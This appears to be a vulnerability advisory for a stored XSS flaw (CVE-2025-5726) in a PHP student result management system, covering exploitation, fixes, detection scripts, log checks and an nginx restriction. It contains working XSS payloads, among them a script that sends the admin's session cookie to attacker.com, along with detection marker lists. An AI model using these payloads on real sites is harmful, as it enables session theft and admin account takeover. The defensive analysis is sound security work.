How the CVE Works
CVE-2025-5726 is a stored Cross-Site Scripting (XSS) vulnerability in SourceCodester Student Result Management System 1.0. The flaw is in the `/script/academic/division-system` component: the `Division` parameter is accepted without sanitization, persisted, and later echoed into the page without output encoding, so an attacker can plant a JavaScript payload in a division name. When an administrator opens the Division System page, the payload runs in the administrator's browser with the administrator's session, enabling cookie theft (if the session cookie is not marked `HttpOnly`) or actions issued on the admin's behalf from the injected script. The attack is remotely exploitable with low complexity and needs only a crafted HTTP request; a public exploit is available, which raises the practical risk.
DailyCVE Form
Platform: SourceCodester
Version: 1.0
Vulnerability: Stored XSS
Severity: Medium
Date: 06/10/2025
Prediction: Patch by 08/2025
What Undercode Say:
Exploitation:
1. Craft a malicious division name, for example:
<script>alert(document.cookie)</script>
2. Submit it through the division creation form. The request below has the shape the advisory describes; the body is shown decoded for readability and must be URL-encoded on the wire, and the application's other form fields are not listed on this page:
POST /script/academic/division-system HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

Division=<script>fetch('https://attacker.com/?cookie='+document.cookie)</script>
3. The stored name is rendered unencoded when an administrator opens the Division System page, so the payload runs in the admin's browser on page load. The cookie-exfiltration variant only yields the session if the cookie lacks HttpOnly; even then, the injected script can still send requests inside the admin's authenticated session.
Protection:
1. Encode the value. The advisory's one-liner encodes on input:
$division = htmlspecialchars($_POST['Division'], ENT_QUOTES, 'UTF-8');
ENT_QUOTES matters: without it a value echoed inside a quoted attribute such as value='...' can close the quote and append an event-handler attribute. The more robust fix is to store the raw name and apply htmlspecialchars(..., ENT_QUOTES, 'UTF-8') at every point where it is echoed into HTML, so that any additional output path is covered as well.
2. Add a CSP header:
Content-Security-Policy: default-src 'self'
This blocks inline <script> blocks and, because connect-src falls back to default-src, also the fetch() to attacker.com. It will equally break any inline scripts the application itself uses, so test before rolling it out; it is defense in depth, not a substitute for output encoding.
3. Verify the patch by behaviour, not by headers. Create a division named <b>test</b> and confirm the page returns it encoded (PHPSESSID is the default PHP session cookie name):
curl -s -b "PHPSESSID=<admin session id>" http://target.com/script/academic/division-system | grep -c "&lt;b&gt;test&lt;/b&gt;"
A count of zero, or a literal <b>test</b> in the output, means the sink is still unencoded. The X-XSS-Protection header is deprecated and its presence says nothing about whether this fix is in place.
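The following is an added example, not code from the Student Result Management System or from this advisory. It models the division-system sink in Python to show where the payload from the Exploitation steps actually lands and why the fix above needs ENT_QUOTES. The two templates (a table cell and an edit form whose value attribute is single-quoted), both payloads, and the helper names are assumptions; executable_parts() is a rough model of what a browser would execute, built on Python's own HTML parser.

```python
"""Added example, not code from the Student Result Management System or
from this advisory: a Python model of the division-system sink.

Assumptions: the two templates stand in for the PHP page echoing a stored
division name into a table cell and into an edit form whose value
attribute is single-quoted; both payloads are constructed; and
executable_parts() is a rough model of what a browser would execute
(it flags <script> elements and on* attributes, nothing else).
"""
import html
from html.parser import HTMLParser

# The advisory's cookie-exfiltration payload, and an attribute-breakout
# payload that needs no angle brackets at all (both constructed).
SCRIPT_PAYLOAD = "<script>fetch('https://attacker.com/?cookie='+document.cookie)</script>"
ATTR_PAYLOAD = "' autofocus onfocus='alert(document.cookie)"

# Two assumed output contexts for a stored division name.
ROW_TEMPLATE = "<tr><td>{name}</td></tr>"
EDIT_TEMPLATE = "<input type=\"text\" name=\"Division\" value='{name}'>"


def render_vulnerable(name: str) -> str:
    """Echo the stored value verbatim, like `echo $row['Division'];` in PHP."""
    return ROW_TEMPLATE.format(name=name) + EDIT_TEMPLATE.format(name=name)


def render_compat(name: str) -> str:
    """Escape &, <, > and double quotes only: htmlspecialchars() with
    ENT_COMPAT (the default before PHP 8.1). Single quotes stay live."""
    escaped = (name.replace("&", "&amp;").replace("<", "&lt;")
                   .replace(">", "&gt;").replace('"', "&quot;"))
    return ROW_TEMPLATE.format(name=escaped) + EDIT_TEMPLATE.format(name=escaped)


def render_hardened(name: str) -> str:
    """Escape &, <, >, " and ': html.escape(quote=True) matches
    htmlspecialchars($s, ENT_QUOTES, 'UTF-8') for this purpose."""
    escaped = html.escape(name, quote=True)
    return ROW_TEMPLATE.format(name=escaped) + EDIT_TEMPLATE.format(name=escaped)


class _ExecutableContent(HTMLParser):
    """Collect what a browser would execute: script elements and any
    on* event-handler attribute that parses as a real attribute."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for attr_name, _value in attrs:
            if attr_name.startswith("on"):
                self.findings.append(f"{tag}@{attr_name}")


def executable_parts(page: str) -> list[str]:
    """Return the executable pieces found in a rendered page (empty means
    nothing executes in this model). Payload text that ends up inside an
    attribute value or a text node is inert and is not reported."""
    parser = _ExecutableContent()
    parser.feed(page)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable),
                          ("ENT_COMPAT", render_compat),
                          ("ENT_QUOTES", render_hardened)):
        for payload in (SCRIPT_PAYLOAD, ATTR_PAYLOAD):
            found = executable_parts(render(payload))
            print(f"{label:10} {found or 'nothing executes'}")
```

The vulnerable renderer executes both payloads; the ENT_COMPAT renderer neutralises the <script> payload but still lets the quote-breakout payload attach an onfocus handler to the input, which is exactly the gap ENT_QUOTES closes.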
Detection:
1. Scan. sqlmap tests for SQL injection and will not find this flaw; use an XSS-capable scanner (OWASP ZAP or Burp Suite) or check by hand: store a harmless marker such as <b>xss-marker-5726</b> as a division name and see whether it comes back unencoded (PHPSESSID is the default PHP session cookie name):
curl -s -b "PHPSESSID=<admin session id>" http://target.com/script/academic/division-system | grep -F "<b>xss-marker-5726</b>"
2. Check logs. The Apache access log records only the request line, not POST bodies, so the stored payload itself will not appear there. Look for URL-encoded markers in request lines and for unexpected POSTs to the vulnerable endpoint:
grep -iE "%3Cscript|<script|javascript:|%3Cimg" /var/log/apache2/access.log
grep "POST /script/academic/division-system" /var/log/apache2/access.log
The authoritative check is the data: query the stored division names for anything containing < or an on*= attribute.
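As an added example (not part of the original advisory), the detection steps above carried out in code: a scanner over Apache combined-format access log lines that flags URL-decoded XSS markers and POSTs to the vulnerable endpoint, plus a check over stored division names, which is the only place the POST-delivered payload can be seen. The log lines are constructed, LOG_RE is a minimal combined-format parser, and XSS_MARKERS is a starter list rather than a complete signature set.

```python
"""Added example, not from the original advisory: scan Apache combined-format
access log lines for XSS markers and for POSTs to the vulnerable endpoint.

Assumptions: SAMPLE_LOG is constructed for this example; LOG_RE is a
minimal combined-format parser (request line and status only); XSS_MARKERS
is a small starter list, not a complete XSS signature set.
"""
import re
from urllib.parse import unquote_plus

WATCHED_PATH = "/script/academic/division-system"   # endpoint from the advisory

# Constructed sample. The last line is the real attack: a POST whose body
# (the Division value) never reaches the access log.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jun/2025:09:12:01 +0000] "GET /script/academic/division-system HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jun/2025:09:13:44 +0000] "GET /script/academic/division-system?Division=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5133 "-" "curl/8.5.0"
203.0.113.7 - - [10/Jun/2025:09:14:02 +0000] "GET /index.php?q=%22%20onmouseover%3D%22alert(1) HTTP/1.1" 200 4400 "-" "curl/8.5.0"
203.0.113.7 - - [10/Jun/2025:09:15:10 +0000] "POST /script/academic/division-system HTTP/1.1" 302 0 "-" "python-requests/2.32"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Checked against the URL-decoded, lower-cased request target.
XSS_MARKERS = ("<script", "javascript:", "onerror=", "onload=",
               "onmouseover=", "onfocus=", "<img", "<svg")


def scan_access_log(text: str) -> list[dict]:
    """Return one finding per suspicious line.

    'xss-marker' findings come from markers in the decoded URL (GET-based
    or reflected attempts). 'post-to-watched-path' findings are POSTs to
    the vulnerable endpoint; the body is not logged, so they are a pointer
    to inspect the stored data, not proof of an attack.
    """
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real tool would count these
        decoded = unquote_plus(m["target"])
        lowered = decoded.lower()
        markers = [mk for mk in XSS_MARKERS if mk in lowered]
        base = {"ip": m["ip"], "time": m["ts"], "method": m["method"],
                "target": decoded, "status": m["status"]}
        if markers:
            findings.append({**base, "reason": "xss-marker", "markers": markers})
        elif m["method"] == "POST" and decoded.split("?", 1)[0] == WATCHED_PATH:
            findings.append({**base, "reason": "post-to-watched-path", "markers": []})
    return findings


# Because the POST body is not logged, the authoritative check is the
# data the application stored.
_STORED_MARKUP_RE = re.compile(r"<|javascript:|\bon[a-z]+\s*=", re.IGNORECASE)


def flag_stored_names(names: list[str]) -> list[str]:
    """Return stored division names that contain HTML or script markup."""
    return [n for n in names if _STORED_MARKUP_RE.search(n)]


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['reason']:20} {f['method']} "
              f"{f['target']} {f['markers']}")
    # Constructed stand-in for the result of selecting the Division column.
    print(flag_stored_names(["Science", "Commerce", "<script>alert(1)</script>",
                             "' autofocus onfocus='alert(1)"]))
```

On the sample, the two curl probes are flagged by marker and the python-requests POST is flagged only as a pointer; feeding the real Division column into flag_stored_names() is what actually reveals a stored payload.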
Mitigation:
1. Temporary access restriction. A rule of the form deny <script>; is not valid nginx: deny takes an address, and core nginx cannot inspect POST bodies at all, so a pattern-based block needs ModSecurity or another WAF module. What nginx can do on its own is limit the endpoint to trusted addresses until the patch is applied:
location ~ ^/script/academic/division-system {
    allow 10.0.0.0/8;   # administrator network, example range
    deny all;
}
2. Disable division creation and editing until the patch is applied, and review already-stored division names for injected markup: a payload saved before the restriction still fires for every admin who opens the page.
References:
- VulDB: CVE-2025-5726
Sources:
Reported By: nvd.nist.gov